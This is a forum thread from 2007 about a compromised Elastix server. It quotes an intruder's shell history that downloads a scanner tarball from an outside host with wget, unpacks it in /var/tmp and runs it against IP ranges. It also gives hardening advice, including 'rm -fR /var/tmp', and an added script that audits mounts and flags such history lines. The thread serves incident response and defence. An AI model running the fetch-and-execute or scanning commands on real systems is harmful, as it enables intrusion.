Elastix Security exploit with /tmp & /var/tmp

Discussion in 'General' started by itakinet, Jul 27, 2007.

  1. itakinet

    Joined:
    Jun 22, 2007
    Messages:
    13
    Likes Received:
    0
    Looks like an exploit in Elastix where an unauthorized user is able to create a user
    called "test"; then, from the /home/test directory, they are able to download a scan script tar file to /var/tmp, where it is untarred and executed.

    here is the "/home/test/.bash_history"

    w
    uname -a
    passwd
    passwd
    cat /proc/cpuinfo
    cd /var/tmp
    cd scan
    ./a 216.14
    ./a 216.17
    ./a 216.20
    ./a 216.161
    ./a 216.162
    ./a 216.163
    w
    cd /tmp
    ls
    cd
    ls
    cd /var/tmp
    ls
    wget geocities.com/datacorz/on.tgz
    tar xzvf on.tgz
    cd scan
    ./a 200.72
    ./a 200.71
    ./a 216.141
    ./a 216.24
    ./a 216.151
    ./a 216.152


    I deleted /var/tmp by

    rm -fR /var/tmp

    then created a symlink to tmp.

    ln -s /tmp /var/tmp

    I would also recommend mounting /tmp as noexec,nosuid,rw, as well as running iptables or some other firewall.

    Any other security recommendations for stock Elastix would be highly appreciated :)
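    An added defender-side check, not a script from the thread or from Elastix: it audits a mount table for the noexec,nosuid options on /tmp and /var/tmp, and flags the fetch, unpack, execute pattern from a shell history like the one above. The mount lines and history are constructed samples, and the mount-table layout assumed is that of /proc/mounts.

```shell
#!/bin/sh
# Added example (not from the original thread): audit temp-dir mount options
# and flag download-unpack-execute sequences inside /tmp or /var/tmp.

# Constructed sample in /proc/mounts layout: "dev mountpoint fstype opts 0 0".
SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
tmpfs /tmp tmpfs rw,nosuid,noexec 0 0
/dev/sda3 /var/tmp ext3 rw 0 0'

# Reads mount-table text on stdin; prints "<dir> ok" when both noexec and
# nosuid are set on /tmp or /var/tmp, else "<dir> MISSING:<options>".
audit_tmp_mounts() {
    awk '$2 == "/tmp" || $2 == "/var/tmp" {
        n = split($4, o, ","); noexec = 0; nosuid = 0
        for (i = 1; i <= n; i++) { if (o[i] == "noexec") noexec = 1; if (o[i] == "nosuid") nosuid = 1 }
        m = ""
        if (!noexec) m = m "noexec,"
        if (!nosuid) m = m "nosuid,"
        if (m == "") print $2 " ok"; else print $2 " MISSING:" substr(m, 1, length(m) - 1)
    }'
}

# Constructed sample history, trimmed from the .bash_history quoted in the post.
SAMPLE_HISTORY='w
uname -a
cd /var/tmp
wget geocities.com/datacorz/on.tgz
tar xzvf on.tgz
cd scan
./a 216.14
./a 216.17
cd
ls
cd /tmp
./a 200.72'

# Reads history lines on stdin; tracks whether the shell is inside a temp dir
# (a bare "cd" or "cd /home..." leaves it) and tags FETCH/UNPACK/EXEC lines there.
flag_history() {
    awk '
    /^cd \/(var\/)?tmp(\/|$)/      { in_tmp = 1 }
    /^cd$/ || /^cd ~/ || /^cd \/home/ { in_tmp = 0 }
    in_tmp && /^(wget|curl) /      { print "FETCH " $0; next }
    in_tmp && /^tar /              { print "UNPACK " $0; next }
    in_tmp && /^\.\//              { print "EXEC " $0 }
    '
}
```

    On a live box the same functions take `cat /proc/mounts` and `cat /home/*/.bash_history` on stdin; a /var/tmp that is a symlink into /tmp will not appear as its own mount line, so only /tmp is reported in that case.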
     
  2. lek

    lek Guest

    Thanks for the info itakinet,

    One question: What does the file on.tgz contain?
     
